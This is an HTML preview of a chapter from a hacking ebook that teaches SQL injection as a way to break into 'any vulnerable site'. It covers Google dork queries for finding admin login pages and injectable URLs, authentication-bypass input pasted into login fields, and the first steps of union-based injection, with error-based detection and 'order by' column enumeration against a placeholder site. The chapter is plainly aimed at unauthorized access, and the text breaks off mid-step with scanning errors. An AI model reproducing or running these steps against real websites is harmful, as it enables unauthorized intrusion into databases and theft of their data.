Hack-X-Crypt by Ujjwal Sahay - HTML preview

PLEASE NOTE: This is an HTML preview only and some elements such as links or page numbers may be incorrect.
Download the book in PDF, ePub, Kindle for a complete version.

img70.png

img71.png

Now take your time and be serious and free before starting this article because this is the very wide and one of the most interesting articles among all of the above chapters. We will discuss in this chapter that how to hack any vulnerable site using SQL injection.

What is SQL Injection?

SQL injection is one of the popular web applications hacking method. Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.

What a hacker can do with SQL Injection attack?

* ByPassing Logins

* Accessing secret data

* Modifying contents of website

* Shutting down the My SQL server

So, here we start with bypassing login i e

Authentication bypass:-

In this type of SQL injection generally if we had found the Admin login page and after that we will try to open the control panel account of the admin by passing the authentication.

If you have the admin login page of any website then you can paste the following codes (with quotes) to bypass the authentication of the website generally PHP websites are vulnerable to this injection:-

You can find these types of sites simply by Google searches. You have to type like this in the Google search bar:-

www.thesitename.comjadminlogin.php?

Or

/admin.php?

Or

Wp-login.php?

Etc.

After finding the login page you have to paste the following codes in both userID and password of the admin page till it will bypassed. If not we will try the next SQL injection i.e. union based, blind based, error based etc.

Codes to be used as both userlD and password at the admin login page of vulnerable website for bypassing authentication are as follow:-

img72.png

lf the authentication bypass will not work then try the following techniques carefully and step by step:-

UNION BASED SQLi:-

Finding Vulnerable Website:

To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. That keyword often called as ͞GOOGLE DaRK .

Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=

Now you have to Copy one of the above keyword and Google it. Here, we will get a lot of search results with which we have to visit the websites one by one for finding the vulnerability.

For example:-

site:www.anyselectedsite.com inurl:index.php?id=

Step 1: Findinging the Vulnerability:

Now let us the vulnerability of the target website. To the vulnerability, add the single quotes]'] at the end of the URL and press enter.

For eg:

http://www.anyselectedsite.com/index.php?id=2'

If the page remains in same page or showing that page not found, then it is not vulnerable.

If you got an error message just like this, then it means that the site is vulnerable.

You have an error in your SQL syntax; the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 2: Finding Number of columns in the database:

Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target Database.

For that replace the single quotes{') with "order by n" statement. Change the n from 1,2,3,4,,S,6,...n. Until you get the error like "unknown column ".

For eg:

http://www.anyselectedsite.com/index.php?id=2 order by 1

http://www.anyselectedsite.com/index.php?id=2 order by 2

http://www.anyselectedsite.com/index.php?id=2 order by 3

http://www.anyselectedsite.com/index.php?id=2 order by 4

If you get the error while trying the "n"th number, then number of

column is "n-1".

I mean:-

http://www.anyselectedsite.com/index.php?id=2 order by 1{no error shown shown) http://www.anyselectedsite.com/index.php?id=2 order by 2{no error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 3{no error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 4{no

error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 5{no

error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 6{no

error shown)

http://www.anyselectedsite.com/index.php?id=2 order by 7{no